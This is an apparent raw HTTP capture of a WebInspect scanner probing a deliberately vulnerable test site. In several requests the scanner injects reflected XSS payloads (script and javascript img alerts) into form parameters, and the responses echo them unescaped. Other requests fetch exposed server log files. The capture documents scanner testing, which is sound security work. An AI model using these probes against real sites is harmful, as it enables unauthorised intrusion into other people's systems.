Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>

GET /pindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:17 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 1771 Content-Type: text/html Cache-control: private <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY> <!-- Hidden Reference comment: should find this file /test/hidden.txt --> <P> The first section shows how a combo box can be used to product optional pages<BR></P> <FORM ACTION="pcomboindex.asp" METHOD="post"> <SELECT NAME="cboPage"> <OPTION SELECTED="SELECTED" VALUE="pc1">Show Page One</OPTION> <OPTION VALUE="pc2">Show Page Two</OPTION> <OPTION VALUE="pc3">Show page three</OPTION> </SELECT><BR> <INPUT TYPE="submit" VALUE="Submit"> </FORM><BR> <HR> <P><A HREF="plink.asp?a=b&c=12">Second section is link that passes parameters to a sub page</A><BR> <BR> <A HREF="error.html">My ERROR</A> Third example allows the user to input values and then shows them on the following page</P> <BR> <HR> <P>False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <BR> False Keyword that should not be flagged: An error has occurred <BR> <BR> <BR> <A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by SmartChecker</A> <BR> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit - Should not be flagged due to not having keyword present</A> <BR> <A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by Smartchecker(Note: No HTML present)</A> <BR> <A HREF="/linking/index.htm">Several chained directories</A> <BR> <A HREF="/cfmerror.html">Cold Fusion Error</A> <BR> <A HREF="/admin/help.cgi">Help</A> <BR> <A HREF="/aspnet.aspx">ASP.NET file</A> </P> <A HREF="sldjfsld;jsdl;kjfsdl;fj">Invalid link</A> <a href="/cookietest/">A cookie test page</a><br> <A HREF="http://www.spidynamics.com:34/login.asp">Timeout Link</A> <A HREF="/auth/">Protected Page</A> </BODY> </HTML>

GET /join.asp?name=>"'><img%20src="javascript:alert('XSS')">&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:35 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4013 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>

GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=>"><script>alert('XSS')</script>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:28 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>

GET /W3SVC1/ex001102.log HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:42:55 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:18 GMT ETag: "d828b92aadc11:8f6" Content-Length: 19 LOGIC CHECK SUCCESS

GET /W3SVC6/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:26:12 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>

GET /errors/errors.log HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:42:24 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:16 GMT ETag: "1ebfab1aadc11:8f6" Content-Length: 8277 <TITLE>LSWEB General Access Error Log</TITLE>Today is: 02-21-2001.<br>You are connecting from 65.80.48.114<br>Using Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)<p>You can use the following to debug your CGI scripts<BR>Reload to update<HR><PRE>[Wed Feb 21 11:10:53 2001] [notice] child pid 20073 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:10:58 2001] [error] [client 192.107.108.150] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi [Wed Feb 21 11:10:58 2001] [error] [client 192.107.108.150] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi [Wed Feb 21 11:11:39 2001] [error] [client 62.104.210.91] File does not exist: /www/htdocs/depts/soc/robots.txt [Wed Feb 21 11:11:56 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/depts/anth/projects/elpilar/transparent.gif [Wed Feb 21 11:12:03 2001] [notice] child pid 20084 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:12:05 2001] [info] [client 209.244.133.207] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:12:08 2001] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 8 children, there are 7 idle, and 33 total children [Wed Feb 21 11:12:09 2001] [notice] child pid 20094 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:12:10 2001] [notice] child pid 20096 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:12:24 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/depts/anth/projects/elpilar/transparent.gif [Wed Feb 21 11:12:28 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:12:47 2001] [info] [client 165.91.173.150] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:13:04 2001] [error] [client 207.107.50.207] File does not exist: /www/htdocs/depts/anth/robots.txt [Wed Feb 21 11:13:11 2001] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 8 children, there are 5 idle, and 33 total children [Wed Feb 21 11:13:13 2001] [error] [client 208.219.77.29] File does not exist: /www/htdocs/depts/ger/robots.txt [Wed Feb 21 11:13:13 2001] [notice] child pid 20115 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:13:18 2001] [info] [client 204.19.14.93] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:14:17 2001] [info] [client 209.146.77.133] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:14:26 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:14:36 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:14:48 2001] [info] [client 128.111.225.51] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:16:15 2001] [error] [client 195.93.66.164] Premature end of script headers: /www/htdocs/depts/ger/projects/hesse/cgi-bin/Count.cgi [Wed Feb 21 11:16:26 2001] [error] [client 207.55.56.14] File does not exist: /www/htdocs/depts/artst/terminals/acker/acker.html [Wed Feb 21 11:16:28 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:16:28 2001] [info] [client 216.125.117.6] send mmap timed out [Wed Feb 21 11:16:33 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:16:34 2001] [error] [client 63.211.243.14] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:16:36 2001] [info] [client 129.252.222.2] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:16:37 2001] [error] [client 128.111.96.187] File does not exist: /www/htdocs/depts/soc/projects/ct3/spacer1.gif [Wed Feb 21 11:16:48 2001] [error] [client 63.227.243.33] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi [Wed Feb 21 11:16:49 2001] [notice] child pid 20154 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:16:58 2001] [info] [client 128.111.96.187] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:17:14 2001] [info] [client 128.111.165.82] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:17:36 2001] [info] [client 130.160.7.76] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:17:41 2001] [error] [client 63.227.243.33] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi [Wed Feb 21 11:17:43 2001] [notice] child pid 20158 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:18:11 2001] [error] [client 160.39.194.62] Premature end of script headers: /www/htdocs/depts/ger/projects/hesse/cgi-bin/Count.cgi [Wed Feb 21 11:18:18 2001] [error] [client 160.39.194.62] Premature end of script headers: /usr/local/web/wwwthreads//postlist.pl [Wed Feb 21 11:18:33 2001] [info] [client 128.111.96.187] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:18:42 2001] [error] [client 165.138.105.253] File does not exist: /www/htdocs/depts/ger/projects/hesse/hesse.html [Wed Feb 21 11:19:04 2001] [error] [client 209.202.148.35] File does not exist: /www/htdocs/depts/writ/robots.txt [Wed Feb 21 11:19:08 2001] [error] [client 216.35.103.75] File does not exist: /www/htdocs/depts/artst/~tvc/v09/interviews/v09int.ser_ulm.html [Wed Feb 21 11:19:24 2001] [notice] child pid 20278 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:19:27 2001] [notice] child pid 20282 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:19:28 2001] [info] [client 195.205.28.2] (32)Broken pipe: client stopped connection before send mmap completed [Wed Feb 21 11:19:34 2001] [notice] child pid 20284 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:21:24 2001] [error] [client 207.55.56.14] File does not exist: /www/htdocs/depts/artst/terminals/t1/wwwboard/faq.html [Wed Feb 21 11:21:25 2001] [notice] child pid 20397 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:21:26 2001] [notice] child pid 20399 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:21:27 2001] [notice] child pid 20400 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:21:28 2001] [info] [client 151.188.89.64] (32)Broken pipe: client stopped connection before send body completed [Wed Feb 21 11:22:11 2001] [error] [client 206.110.15.140] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:22:11 2001] [error] [client 206.110.15.140] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:23:28 2001] [notice] child pid 20422 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9 [Wed Feb 21 11:23:37 2001] [error] [client 65.5.146.93] File does not exist: /www/htdocs/depts/writ/faculty/johnston/courses/writ2/w01 [Wed Feb 21 11:23:54 2001] [error] [client 200.15.34.155] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif [Wed Feb 21 11:24:53 2001] [error] [client 128.111.36.88] File does not exist: /www/htdocs/depts/anth/classes/wo1/anth2 [Wed Feb 21 11:25:02 2001] [error] [client 128.111.36.88] File does not exist: /www/htdocs/depts/anth/classes/wo1/anth2 [Wed Feb 21 11:25:09 2001] [error] [client 216.208.71.130] File does not exist: /www/htdocs/depts/ger/projects/hesse/hesse.html </PRE>

GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=>"'><img%20src="javascript:alert('XSS')">&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:39 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4013 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>

POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 11 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect cboPage=pc3

HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:21 GMT X-Powered-By: ASP.NET Location: p3.asp Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>

GET /join.asp?name=&email=&surname=&house=&street=&address2=>"'><img%20src="javascript:alert('XSS')">&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect

